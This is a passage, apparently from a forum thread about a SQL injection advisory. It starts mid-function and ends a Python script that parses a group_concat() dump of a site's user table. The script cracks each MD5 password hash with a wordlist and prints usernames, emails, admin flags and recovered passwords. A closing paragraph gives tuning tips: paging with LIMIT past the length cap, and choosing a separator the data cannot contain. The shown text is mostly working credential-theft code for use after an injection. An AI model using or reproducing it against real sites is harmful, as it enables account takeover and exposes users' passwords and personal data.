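    """Parse the dump and annotate each row with a cracked password (if any)
    and boolean admin/banned flags."""
    rows = parse_group_concat(blob)
    for row in rows:
        row["password"] = crack_md5(row["md5_password"], wordlist)
        row["is_admin"] = row["is_admin"] == "1"
        row["is_banned"] = row["is_banned"] == "1"
    return rows


if __name__ == "__main__":
    for row in recover_accounts():
        print(f"{row['username']:8} {row['email']:20} admin={row['is_admin']} "
              f"banned={row['is_banned']} password={row['password']}")
```

    Two caveats a practitioner would want: group_concat() is capped by group_concat_max_len (1024 bytes by default), so a larger user table comes back truncated and needs paging with LIMIT, as the PHPNet script earlier in this thread does one row at a time; and the separator should be something the data cannot contain, which is why the advisory picks `<=>` rather than a comma for the columns.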
